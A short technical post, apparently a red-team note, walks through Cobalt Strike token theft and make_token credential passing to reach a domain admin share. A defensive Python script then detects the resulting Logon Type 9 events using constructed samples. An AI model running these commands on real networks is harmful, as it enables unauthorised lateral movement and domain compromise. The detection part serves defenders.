Cobalt Strike PtH (pass the hash)

Look for processes running under a domain account (you may come across a Domain Admin):

shell tasklist /v

Impersonate its token:

steal_token pid

Try to use it:

shell dir \\10.0.0.1\c$

Alternatively, if you have obtained the domain admin's plaintext password, you can make a token and pass it instead:

beacon> help make_token
Use: make_token [DOMAIN\user] [password]

Clone the current access token and set it up to pass the specified username
and password when you interact with network resources. This command does not
validate the credentials you provide and it has no effect on local actions.
eg:
make_token x51.test\administrator password4administrator
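From the defender's side, the make_token step above leaves a recognisable trace: it clones the token with alternate network credentials, which Windows records as Security event 4624 with Logon Type 9 (NewCredentials) and logon process "seclogo". The check below is an added example, not part of the original post or of Cobalt Strike; the event records are constructed samples in a key=value form, and the ProcessName-based triage rule is an assumption about what is worth looking at first.

```python
import re

# Constructed sample Security log records (not real telemetry), flattened to key=value.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=2 LogonProcessName=User32 AuthenticationPackageName=Negotiate "
    "TargetDomainName=CORP TargetUserName=alice ProcessName=C:\\Windows\\System32\\winlogon.exe",
    "EventID=4624 LogonType=9 LogonProcessName=seclogo AuthenticationPackageName=Negotiate "
    "TargetDomainName=x51.test TargetUserName=administrator "
    "ProcessName=C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe",
    "EventID=4624 LogonType=3 LogonProcessName=NtLmSsp AuthenticationPackageName=NTLM "
    "TargetDomainName=CORP TargetUserName=svc_backup ProcessName=-",
    "EventID=4672 SubjectDomainName=CORP SubjectUserName=alice",
]

KV = re.compile(r"(\w+)=(\S+)")
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")


def parse_event(line):
    """Turn one flattened key=value record into a dict."""
    return dict(KV.findall(line))


def is_new_credentials_logon(ev):
    """4624 + Logon Type 9 = NewCredentials: the caller kept its own identity locally
    but attached other credentials for network access. make_token does exactly this
    (so does runas /netonly), and the logon process is reported as 'seclogo'."""
    return (ev.get("EventID") == "4624"
            and ev.get("LogonType") == "9"
            and ev.get("LogonProcessName", "").lower() == "seclogo")


def find_make_token_candidates(lines):
    """Return the NewCredentials logons with the fields an analyst triages on.
    A calling process outside the system directories is an assumed priority signal:
    legitimate runas /netonly comes from a known admin tool, a beacon usually does not."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if not is_new_credentials_logon(ev):
            continue
        proc = ev.get("ProcessName", "-")
        hits.append({
            "user": f"{ev.get('TargetDomainName')}\\{ev.get('TargetUserName')}",
            "process": proc,
            "process_in_user_writable_path": not proc.lower().startswith(SYSTEM_DIRS),
        })
    return hits


if __name__ == "__main__":
    for hit in find_make_token_candidates(SAMPLE_EVENTS):
        print(hit)
```

Logon Type 9 on its own is a lead rather than proof, so baseline which processes and accounts normally produce it before alerting on every hit.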

Cobalt Strike official blog write-up

To be added